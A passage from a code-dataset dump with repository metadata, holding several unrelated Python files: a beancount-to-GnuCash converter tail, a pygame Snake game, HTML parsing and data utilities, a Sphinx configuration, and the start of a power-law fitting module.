full_name = ":".join(parent)
if any([full_name == row[ACC_HEADERS["full_name"]] for row in rows]):
break
matched_type = get_close_matches(
parent[0].upper(), GNUCASH_ACC_TYPES, n=1)[0]
row = create_row(full_name, parent[-1], matched_type, currency,
"T" if len(parent) == 1 else "F")
rows.append(row)
parent = parent[:-1]
rows.sort(key=lambda row: row[ACC_HEADERS["full_name"]].count(":"))
out_filename = basename + '_accounts.csv'
with open(out_filename, 'w', newline='') as csvfile:
writer = csv.DictWriter(
csvfile, ACC_HEADERS.values(), quoting=csv.QUOTE_ALL)
writer.writeheader()
for row in rows:
writer.writerow(row)
print("Written to " + out_filename)
def parse_args():
def filename(x):
x = str(x)
if not os.path.isfile(x):
raise argparse.ArgumentTypeError("Given filename is not a file")
return x
parser = argparse.ArgumentParser()
parser.add_argument(LEDGER_FILENAME, type=filename,
help="filename of beancount ledger file")
return parser.parse_args()
if __name__ == "__main__":
args = parse_args()
main(args.ledger_filename)
| [
"[email protected]"
] | |
528e65d3ed31b3633bd16eca31c0589448258003 | 1a39f63f7eb10ade06babcc42277ed5c6920d6d9 | /main.py | 5ad459c28a5df223af183ec09b8646ff957de84b | [
"MIT"
] | permissive | TanishqSinghAnand/Snake-Game | 8e8c9661c7e882ec2aafaa9c60cee9a18ca0ac8a | 7443ef88d033035225f0680828b5cacbf565d976 | refs/heads/master | 2023-01-22T22:48:22.107623 | 2020-11-19T05:08:49 | 2020-11-19T05:08:49 | 314,266,009 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,429 | py | import random
import pygame
import sys
from pygame.locals import *
FPS = 15
WINDOWWIDTH = 640
WINDOWHEIGHT = 480
CELLSIZE = 20
assert WINDOWWIDTH % CELLSIZE == 0, "Window width must be a multiple of cell size."
assert WINDOWHEIGHT % CELLSIZE == 0, "Window height must be a multiple of cell size."
CELLWIDTH = int(WINDOWWIDTH / CELLSIZE)
CELLHEIGHT = int(WINDOWHEIGHT / CELLSIZE)
WHITE = (255, 255, 255)
BLACK = (0, 0, 0)
RED = (255, 0, 0)
GREEN = (0, 255, 0)
DARKGREEN = (0, 155, 0)
DARKGRAY = (40, 40, 40)
BGCOLOR = BLACK
UP = 'up'
DOWN = 'down'
LEFT = 'left'
RIGHT = 'right'
HEAD = 0 # syntactic sugar: index of the worm's head
def main():
global FPSCLOCK, DISPLAYSURF, BASICFONT
pygame.init()
FPSCLOCK = pygame.time.Clock()
DISPLAYSURF = pygame.display.set_mode((WINDOWWIDTH, WINDOWHEIGHT))
BASICFONT = pygame.font.Font('freesansbold.ttf', 18)
pygame.display.set_caption('Snake Game')
showStartScreen()
while True:
runGame()
showGameOverScreen()
def runGame():
# Set a random start point.
startx = random.randint(5, CELLWIDTH - 6)
starty = random.randint(5, CELLHEIGHT - 6)
wormCoords = [{'x': startx, 'y': starty},
{'x': startx - 1, 'y': starty},
{'x': startx - 2, 'y': starty}]
direction = RIGHT
# Start the apple in a random place.
apple = getRandomLocation()
while True:
for event in pygame.event.get(): # event handling loop
if event.type == QUIT:
terminate()
elif event.type == KEYDOWN:
if (event.key == K_LEFT or event.key == K_a) and direction != RIGHT:
direction = LEFT
elif (event.key == K_RIGHT or event.key == K_d) and direction != LEFT:
direction = RIGHT
elif (event.key == K_UP or event.key == K_w) and direction != DOWN:
direction = UP
elif (event.key == K_DOWN or event.key == K_s) and direction != UP:
direction = DOWN
elif event.key == K_ESCAPE:
terminate()
# check if the worm has hit itself or the edge
if wormCoords[HEAD]['x'] == -1 or wormCoords[HEAD]['x'] == CELLWIDTH or wormCoords[HEAD]['y'] == -1 or wormCoords[HEAD]['y'] == CELLHEIGHT:
return # game over
for wormBody in wormCoords[1:]:
if wormBody['x'] == wormCoords[HEAD]['x'] and wormBody['y'] == wormCoords[HEAD]['y']:
return # game over
# check if worm has eaten an apply
if wormCoords[HEAD]['x'] == apple['x'] and wormCoords[HEAD]['y'] == apple['y']:
# don't remove worm's tail segment
apple = getRandomLocation() # set a new apple somewhere
else:
del wormCoords[-1] # remove worm's tail segment
# move the worm by adding a segment in the direction it is moving
if direction == UP:
newHead = {'x': wormCoords[HEAD]['x'],
'y': wormCoords[HEAD]['y'] - 1}
elif direction == DOWN:
newHead = {'x': wormCoords[HEAD]['x'],
'y': wormCoords[HEAD]['y'] + 1}
elif direction == LEFT:
newHead = {'x': wormCoords[HEAD]
['x'] - 1, 'y': wormCoords[HEAD]['y']}
elif direction == RIGHT:
newHead = {'x': wormCoords[HEAD]
['x'] + 1, 'y': wormCoords[HEAD]['y']}
wormCoords.insert(0, newHead)
DISPLAYSURF.fill(BGCOLOR)
drawGrid()
drawWorm(wormCoords)
drawApple(apple)
drawScore(len(wormCoords) - 3)
pygame.display.update()
FPSCLOCK.tick(FPS)
def drawPressKeyMsg():
pressKeySurf = BASICFONT.render('Press a key to play.', True, DARKGRAY)
pressKeyRect = pressKeySurf.get_rect()
pressKeyRect.topleft = (WINDOWWIDTH - 200, WINDOWHEIGHT - 30)
DISPLAYSURF.blit(pressKeySurf, pressKeyRect)
def checkForKeyPress():
if len(pygame.event.get(QUIT)) > 0:
terminate()
keyUpEvents = pygame.event.get(KEYUP)
if len(keyUpEvents) == 0:
return None
if keyUpEvents[0].key == K_ESCAPE:
terminate()
return keyUpEvents[0].key
def showStartScreen():
titleFont = pygame.font.Font('freesansbold.ttf', 100)
titleSurf1 = titleFont.render('Snake Game!', True, WHITE, DARKGREEN)
titleSurf2 = titleFont.render('Snake Game!', True, GREEN)
degrees1 = 0
degrees2 = 0
while True:
DISPLAYSURF.fill(BGCOLOR)
rotatedSurf1 = pygame.transform.rotate(titleSurf1, degrees1)
rotatedRect1 = rotatedSurf1.get_rect()
rotatedRect1.center = (WINDOWWIDTH / 2, WINDOWHEIGHT / 2)
DISPLAYSURF.blit(rotatedSurf1, rotatedRect1)
rotatedSurf2 = pygame.transform.rotate(titleSurf2, degrees2)
rotatedRect2 = rotatedSurf2.get_rect()
rotatedRect2.center = (WINDOWWIDTH / 2, WINDOWHEIGHT / 2)
DISPLAYSURF.blit(rotatedSurf2, rotatedRect2)
drawPressKeyMsg()
if checkForKeyPress():
pygame.event.get() # clear event queue
return
pygame.display.update()
FPSCLOCK.tick(FPS)
degrees1 += 3 # rotate by 3 degrees each frame
degrees2 += 7 # rotate by 7 degrees each frame
def terminate():
pygame.quit()
sys.exit()
def getRandomLocation():
return {'x': random.randint(0, CELLWIDTH - 1), 'y': random.randint(0, CELLHEIGHT - 1)}
def showGameOverScreen():
gameOverFont = pygame.font.Font('freesansbold.ttf', 150)
gameSurf = gameOverFont.render('Game', True, WHITE)
overSurf = gameOverFont.render('Over', True, WHITE)
gameRect = gameSurf.get_rect()
overRect = overSurf.get_rect()
gameRect.midtop = (WINDOWWIDTH / 2, 10)
overRect.midtop = (WINDOWWIDTH / 2, gameRect.height + 10 + 25)
DISPLAYSURF.blit(gameSurf, gameRect)
DISPLAYSURF.blit(overSurf, overRect)
drawPressKeyMsg()
pygame.display.update()
pygame.time.wait(500)
checkForKeyPress() # clear out any key presses in the event queue
while True:
if checkForKeyPress():
pygame.event.get() # clear event queue
return
def drawScore(score):
scoreSurf = BASICFONT.render('Score: %s' % (score), True, WHITE)
scoreRect = scoreSurf.get_rect()
scoreRect.topleft = (WINDOWWIDTH - 120, 10)
DISPLAYSURF.blit(scoreSurf, scoreRect)
def drawWorm(wormCoords):
for coord in wormCoords:
x = coord['x'] * CELLSIZE
y = coord['y'] * CELLSIZE
wormSegmentRect = pygame.Rect(x, y, CELLSIZE, CELLSIZE)
pygame.draw.rect(DISPLAYSURF, DARKGREEN, wormSegmentRect)
wormInnerSegmentRect = pygame.Rect(
x + 4, y + 4, CELLSIZE - 8, CELLSIZE - 8)
pygame.draw.rect(DISPLAYSURF, GREEN, wormInnerSegmentRect)
def drawApple(coord):
x = coord['x'] * CELLSIZE
y = coord['y'] * CELLSIZE
appleRect = pygame.Rect(x, y, CELLSIZE, CELLSIZE)
pygame.draw.rect(DISPLAYSURF, RED, appleRect)
def drawGrid():
for x in range(0, WINDOWWIDTH, CELLSIZE): # draw vertical lines
pygame.draw.line(DISPLAYSURF, DARKGRAY, (x, 0), (x, WINDOWHEIGHT))
for y in range(0, WINDOWHEIGHT, CELLSIZE): # draw horizontal lines
pygame.draw.line(DISPLAYSURF, DARKGRAY, (0, y), (WINDOWWIDTH, y))
if __name__ == '__main__':
main()
| [
"[email protected]"
] | |
2e25806580836631d6e2798b5384d8666c21ee62 | 5806179a278376dc3e74e9f325e32ab822549388 | /anlysisHtml.py | 364b4dfbee42b3d54a4c6afcb5e3b2d41d5b4486 | [] | no_license | wobuaixiatian/python | 6d3253354c1e70759268a4e91f131dfc270ea7cd | 99d70bc2a2a456e185f2f5b1f712db69221efcba | refs/heads/master | 2021-08-28T04:44:41.636349 | 2017-12-11T07:33:19 | 2017-12-11T07:33:19 | 110,091,373 | 0 | 0 | null | 2017-11-09T09:05:02 | 2017-11-09T09:01:32 | null | UTF-8 | Python | false | false | 560 | py | #!/usr/bin/env python3
#coding=utf-8
from html.parser import HTMLParser
class HeadingParser(HTMLParser):
inHeading = False
def handle_starttag(self, tag, attrs):
if tag=="h1":
self.inHeading=True
print(attrs)
print(len(attrs))
print(attrs[0])
print(attrs[0][0])
print("Found a Heading 1")
def handle_data(self, data):
if self.inHeading:
print(data)
def handle_endtag(self, tag):
if tag=="h1":
self.inHeading = False
hParser = HeadingParser()
file = open("html.html","r")
html = file.read()
file.close
hParser.feed(html)
| [
"[email protected]"
] | |
32b159d3e89f55e8eccccecfaf31297f24ad7ebc | 2d9fe8fb852c1db37d4408e5ee4fe1b5baa5b3ba | /question7.py | 461623baea8f4c9fbe702e729b34d90d7359dde4 | [] | no_license | tUNg131/Problem-sets | 6a1348612f53f85caa56fc3992e82701dbf84013 | 9bc917dd74bff82eb1ddd2d46a9b6748560f77e0 | refs/heads/master | 2020-12-02T13:56:06.188396 | 2020-01-02T05:44:32 | 2020-01-02T05:44:32 | 231,029,280 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 203 | py | import pdb
items =[int(x) for x in input().split(',')]
rowNum = items[0]
colNum = items[1]
values = [None] * rowNum
for i in range(rowNum):
values[i] = [j*i for j in range(colNum)]
print(values)
| [
"[email protected]"
] | |
6c4f6816a6de12a44d590d811c46cefc4ea60004 | c1ad3ee7e6445f59bc010c044ca08668b157fc8e | /Logic/Logic.py | 7b70b3edf977b96fac36d6509c932e41806dd0fc | [] | no_license | MennaAly/StockMarket | 2bbc79cc7e085ca5c808d5c5f7b3a3b3530f03a3 | 5372ca30bbc280da1d3539112171ce9b069ea736 | refs/heads/master | 2020-03-24T14:07:56.892422 | 2018-07-29T21:45:17 | 2018-07-29T21:45:17 | 142,760,112 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 372 | py |
class logic():
def collectColoumnData(self,data):
coloumn = ''
for idx,element in enumerate(data):
if idx != len(data)-1:
coloumn = coloumn + element + ','
else :
coloumn = coloumn + element
return coloumn
def seperateColumnData(self,coloumn):
return coloumn.split(',')
| [
"[email protected]"
] | |
aaaf565ad47e8103eb9e97641bdf8ffd51d95875 | d1da57ac542041d33a5b9e422d80ae5266b5c21f | /utils.py | 1b8fab5ba1147a0c13037d24a6e36ac113cb92fa | [] | no_license | GiBg1aN/TVVSD | 17937c9c7a38e751c38299ec2e5f9af8b406a847 | 4c43b10456dba55fc35690bff486f87cc857df14 | refs/heads/master | 2023-01-05T00:20:47.705989 | 2020-11-08T09:21:51 | 2020-11-08T09:21:51 | 177,809,913 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,645 | py | import numpy as np
import pandas as pd
def filter_senses(senses: pd.DataFrame, sense_labels: pd.DataFrame) -> pd.DataFrame:
"""
Remove senses that are not used in dataset images.
Args:
senses: A dataframe of verb senses
sense_labels: A dataframe containing the correct sense for each
pair (image, verb).
Returns:
A dataset containing only the senses in 'sense_labels'
"""
new_senses = pd.DataFrame(columns=['lemma', 'sense_num', 'definition',
'ontonotes_sense_examples', 'visualness_label'])
for _, row in enumerate(senses.itertuples()):
sense = getattr(row, 'lemma')
sense_id = getattr(row, 'sense_num')
occurrences = sense_labels.query("lemma == @sense and sense_chosen == @sense_id")
if occurrences.shape[0] > 0:
new_senses = new_senses.append([row], sort=False)
new_senses = new_senses.drop(columns=['Index'])
new_senses.reset_index(inplace=True, drop=True)
return new_senses
def filter_image_name(img_name: str) -> str:
"""
Remove image name prefixes.
In COCO image annotations labels had a prefix which is incompatible
with other image names sources. The purpose of this function is
to remove such prefixes.
Args:
img_name: image name in the form PREFIX_XXXX.jpeg
Returns:
The XXXX image identifier
Raises:
ValueError: when the image prefix is not known
"""
train_prefix = 'COCO_train2014_'
val_prefix = 'COCO_val2014_'
if img_name.startswith(train_prefix):
stripped_zeros = train_prefix + str(int(img_name[len(train_prefix):-4]))
elif img_name.startswith(val_prefix):
stripped_zeros = val_prefix + str(int(img_name[len(val_prefix):-4]))
else:
stripped_zeros = img_name
return stripped_zeros.split('.')[0]
def combine_data(embeddings: pd.DataFrame, images_features: pd.DataFrame) -> pd.DataFrame:
"""
Concatenate the 300-dim word-embeddings-vector and the 4096-dim
VGG16 feature vector and unit-normalise the output vector.
Args:
embeddings: embedding vector
images_features: visual feature-vector
Returns:
A dataframe containing the columns:
'e_caption', 'e_object', 'e_combined', 'e_image',
'concat_image_caption', 'concat_image_object', 'concat_image_text'.
"""
full_dataframe = pd.concat([embeddings, images_features], axis=1, sort=True)
full_dataframe['concat_image_caption'] = full_dataframe.apply(
lambda r: np.concatenate([r.e_caption, r.e_image.ravel()]), axis=1)
full_dataframe['concat_image_object'] = full_dataframe.apply(
lambda r: np.concatenate([r.e_object, r.e_image.ravel()]), axis=1)
full_dataframe['concat_image_text'] = full_dataframe.apply(
lambda r: np.concatenate([r.e_combined, r.e_image.ravel()]), axis=1)
return full_dataframe.applymap(lambda x: x / np.linalg.norm(x, ord=2))
def aggregate_stats(experiments_path):
columns = ['labels_per_class', 'alpha', 'verb_type', 'representation_type', 'accuracy']
experiments = pd.read_csv(experiments_path, names=columns)[['labels_per_class', 'representation_type', 'verb_type', 'accuracy']]
aggregated_data = experiments.groupby(['labels_per_class', 'representation_type', 'verb_type'], as_index=False).agg({'accuracy': ['mean', lambda x: x.std(ddof=0)]})
aggregated_data.columns = ['labels_per_class', 'representation_type', 'verb_type', 'mean', 'std']
aggregated_data.to_html('results.html')
print('Aggregated results written to an HTML file.')
| [
"[email protected]"
] | |
03e5eae2cb9acad5815aa5fbf6229dcc8d178b22 | c33fd38d2c79ca740b0bcde934034168a37698aa | /myenv/bin/gunicorn | 95c1f3bdbc438aa3fd5fd24b7744132c8568e1c9 | [] | no_license | kxnaylorCLE216/resumeSite | 7531da230b35e7abb057f53cb44d747e22c4c81a | 7aaa2aa59ae1fc4b8faf7c56c904c65b9fdf9b6e | refs/heads/master | 2022-10-06T04:47:28.667125 | 2019-06-28T02:59:02 | 2019-06-28T02:59:02 | 193,295,961 | 1 | 0 | null | 2022-09-23T22:26:15 | 2019-06-23T01:56:11 | Python | UTF-8 | Python | false | false | 248 | #!/home/kxn/Repos/resumeSite/myenv/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from gunicorn.app.wsgiapp import run
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(run())
| [
"[email protected]"
] | ||
ea4b5219ef13b73d5f4b75e5b228f31c963c9b3d | 4d9cc4aa35cf950f7cf2a90b8feae293901bb560 | /docsite/source/conf.py | c65216b602969da9c566722a48fb88a88a4a3a46 | [
"LicenseRef-scancode-warranty-disclaimer",
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | wgd3/dcaf | 0dc445daf04832f43d4a895314508f46750be821 | 24d95d74072d0946cba499e671e3440a7bb4e574 | refs/heads/master | 2021-01-12T11:46:25.511293 | 2016-04-08T17:42:33 | 2016-04-08T17:42:33 | 54,895,839 | 0 | 0 | null | 2016-03-28T13:56:03 | 2016-03-28T13:56:03 | null | UTF-8 | Python | false | false | 9,376 | py | # -*- coding: utf-8 -*-
#
# CSC DCAF documentation build configuration file, created by
# sphinx-quickstart on Thu Mar 3 14:19:20 2016.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
import sphinx_rtd_theme
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.todo',
'sphinx.ext.coverage',
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'CSC DCAF'
copyright = u'2016, CSC'
author = u'Extreme Automation'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = u'1.2'
# The full version, including alpha/beta/rc tags.
release = u'1.2'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = []
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = True
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'sphinx_rtd_theme'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (relative to this directory) to use as a favicon of
# the docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Language to be used for generating the HTML full-text search index.
# Sphinx supports the following languages:
# 'da', 'de', 'en', 'es', 'fi', 'fr', 'hu', 'it', 'ja'
# 'nl', 'no', 'pt', 'ro', 'ru', 'sv', 'tr'
#html_search_language = 'en'
# A dictionary with options for the search language support, empty by default.
# Now only 'ja' uses this config value
#html_search_options = {'type': 'default'}
# The name of a javascript file (relative to the configuration directory) that
# implements a search results scorer. If empty, the default will be used.
#html_search_scorer = 'scorer.js'
# Output file base name for HTML help builder.
htmlhelp_basename = 'CSC-DCAFdoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
# Latex figure (float) alignment
#'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'CSC-DCAF.tex', u'CSC DCAF Documentation',
u'Automation Team', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'dcaf', u'CSC DCAF Documentation',
[author], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'DCAF', u'CSC DCAF Documentation',
author, 'CSC DCAF', 'A framework of resources designed to automate various platforms and deployments within the data center.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
| [
"[email protected]"
] | |
41117c486c96cbc1a0b8327e00987380acb66a43 | 7a755ea07e20f238d171d0a00fae10c03c7fb873 | /plfit/plfit.py | fcfb89053086b20a7cab3b3807df4e1137583ec4 | [
"MIT"
] | permissive | tbowers7/plfit | 14bedc6af0d62e70b201d3047d84b99a33b744cb | 37c831d674927cfde9c7e9e85623cd7bd056b950 | refs/heads/master | 2020-05-20T19:29:30.715766 | 2014-02-05T20:20:15 | 2014-02-05T20:20:15 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 34,899 | py | # -*- coding: latin-1 -*-
#
# intended to implement a power-law fitting routine as specified in.....
# http://www.santafe.edu/~aaronc/powerlaws/
#
# The MLE for the power-law alpha is very easy to derive given knowledge
# of the lowest value at which a power law holds, but that point is
# difficult to derive and must be acquired iteratively.
"""
numpy/matplotlib version of plfit.py
====================================
A power-law distribution fitter based on code by Aaron Clauset. It can use
fortran, cython, or numpy-based power-law fitting 'backends'. Fortran's
fastest.
Requires pylab (matplotlib), which requires numpy
Example very simple use::
from plfit import plfit
MyPL = plfit(mydata)
MyPL.plotpdf(log=True)
"""
import numpy
import time
import pylab
try:
import fplfit
fortranOK = True
except:
fortranOK = False
try:
import cplfit
cyOK = True
except:
cyOK = False
import numpy.random as npr
from numpy import log,log10,sum,argmin,argmax,exp,min,max
try:
import scipy.stats
scipyOK = True
except ImportError:
scipyOK = False
print "scipy didn't import. Can't compute certain basic statistics."
class plfit:
"""
A Python implementation of the Matlab code `http://www.santafe.edu/~aaronc/powerlaws/plfit.m`_
from `http://www.santafe.edu/~aaronc/powerlaws/`_.
See `A. Clauset, C.R. Shalizi, and M.E.J. Newman, "Power-law distributions
in empirical data" SIAM Review, 51, 661-703 (2009). (arXiv:0706.1062)
<http://arxiv.org/abs/0706.1062>`_
The output "alpha" is defined such that :math:`p(x) \sim (x/xmin)^{-alpha}`
"""
def __init__(self,x,**kwargs):
"""
Initializes and fits the power law. Can pass "quiet" to turn off
output (except for warnings; "silent" turns off warnings)
"""
x = numpy.array(x) # make sure x is an array, otherwise the next step fails
if (x<0).sum() > 0:
print "Removed %i negative points" % ((x<0).sum())
x = x[x>0]
self.data = x
self.plfit(**kwargs)
def alpha_(self,x):
""" Create a mappable function alpha to apply to each xmin in a list of xmins.
This is essentially the slow version of fplfit/cplfit, though I bet it could
be speeded up with a clever use of parellel_map. Not intended to be used by users.
Docstring for the generated alpha function::
Given a sorted data set and a minimum, returns power law MLE fit
data is passed as a keyword parameter so that it can be vectorized
If there is only one element, return alpha=0
"""
def alpha(xmin,x=x):
gexmin = x>=xmin
n = gexmin.sum()
if n < 2:
return 0
x = x[gexmin]
a = 1 + float(n) / sum(log(x/xmin))
return a
return alpha
def kstest_(self,x):
"""
Create a mappable function kstest to apply to each xmin in a list of xmins.
Docstring for the generated kstest function::
Given a sorted data set and a minimum, returns power law MLE ks-test w/data
data is passed as a keyword parameter so that it can be vectorized
The returned value is the "D" parameter in the ks test.
"""
def kstest(xmin,x=x):
x = x[x>=xmin]
n = float(len(x))
if n == 0: return numpy.inf
a = float(n) / sum(log(x/xmin))
cx = numpy.arange(n,dtype='float')/float(n)
cf = 1-(xmin/x)**a
ks = max(abs(cf-cx))
return ks
return kstest
def plfit(self, nosmall=True, finite=False, quiet=False, silent=False,
usefortran=False, usecy=False, xmin=None, verbose=False,
discrete=None, discrete_approx=True, discrete_n_alpha=1000):
"""
A Python implementation of the Matlab code http://www.santafe.edu/~aaronc/powerlaws/plfit.m
from http://www.santafe.edu/~aaronc/powerlaws/
See A. Clauset, C.R. Shalizi, and M.E.J. Newman, "Power-law distributions
in empirical data" SIAM Review, 51, 661-703 (2009). (arXiv:0706.1062)
http://arxiv.org/abs/0706.1062
There are 3 implementations of xmin estimation. The fortran version is fastest, the C (cython)
version is ~10% slower, and the python version is ~3x slower than the fortran version.
Also, the cython code suffers ~2% numerical error relative to the fortran and python for unknown
reasons.
There is also a discrete version implemented in python - it is different from the continous version!
*discrete* [ bool | None ]
If *discrete* is None, the code will try to determine whether the
data set is discrete or continous based on the uniqueness of the
data; if your data set is continuous but you have any non-unique
data points (e.g., flagged "bad" data), the "automatic"
determination will fail. If *discrete* is True or False, the
distcrete or continuous fitter will be used, respectively.
*xmin* [ float / int ]
If you specify xmin, the fitter will only determine alpha assuming
the given xmin; the rest of the code (and most of the complexity)
is determining an estimate for xmin and alpha.
*nosmall* [ bool (True) ]
When on, the code rejects low s/n points. WARNING: This option,
which is on by default, may result in different answers than the
original Matlab code and the "powerlaw" python package
*finite* [ bool (False) ]
There is a 'finite-size bias' to the estimator. The "alpha" the code measures
is "alpha-hat" s.t. ᾶ = (nα-1)/(n-1), or α = (1 + ᾶ (n-1)) / n
*quiet* [ bool (False) ]
If False, delivers messages about what fitter is used and the fit results
*verbose* [ bool (False) ]
Deliver descriptive messages about the fit parameters (only if *quiet*==False)
*silent* [ bool (False) ]
If True, will print NO messages
"""
x = self.data
z = numpy.sort(x)
t = time.time()
xmins,argxmins = numpy.unique(z,return_index=True)#[:-1]
self._nunique = len(xmins)
if self._nunique == len(x) and discrete is None:
if verbose: print "Using CONTINUOUS fitter"
discrete = False
elif self._nunique < len(x) and discrete is None:
if verbose: print "Using DISCRETE fitter"
discrete = True
t = time.time()
if xmin is None:
if discrete:
self.discrete_best_alpha(approximate=discrete_approx,
n_alpha=discrete_n_alpha,
verbose=verbose,
finite=finite)
return self._xmin,self._alpha
elif usefortran and fortranOK:
dat,av = fplfit.plfit(z,int(nosmall))
goodvals=dat>0
sigma = ((av-1)/numpy.sqrt(len(z)-numpy.arange(len(z))))[argxmins]
dat = dat[goodvals]
av = av[goodvals]
if nosmall:
# data, av a;ready treated for this. sigma, xmins not
nmax = argmin(sigma<0.1)
xmins = xmins[:nmax]
sigma = sigma[:nmax]
if not quiet: print "FORTRAN plfit executed in %f seconds" % (time.time()-t)
elif usecy and cyOK:
dat,av = cplfit.plfit_loop(z,nosmall=nosmall,zunique=xmins,argunique=argxmins)
goodvals=dat>0
sigma = (av-1)/numpy.sqrt(len(z)-argxmins+1)
dat = dat[goodvals]
av = av[goodvals]
if not quiet: print "CYTHON plfit executed in %f seconds" % (time.time()-t)
else:
av = numpy.asarray( map(self.alpha_(z),xmins) ,dtype='float')
dat = numpy.asarray( map(self.kstest_(z),xmins),dtype='float')
sigma = (av-1)/numpy.sqrt(len(z)-argxmins+1)
if nosmall:
# test to make sure the number of data points is high enough
# to provide a reasonable s/n on the computed alpha
goodvals = sigma<0.1
nmax = argmin(goodvals)
if nmax > 0:
dat = dat[:nmax]
xmins = xmins[:nmax]
av = av[:nmax]
sigma = sigma[:nmax]
else:
if not silent:
print "Not enough data left after flagging - using all positive data."
if not quiet:
print "PYTHON plfit executed in %f seconds" % (time.time()-t)
if usefortran: print "fortran fplfit did not load"
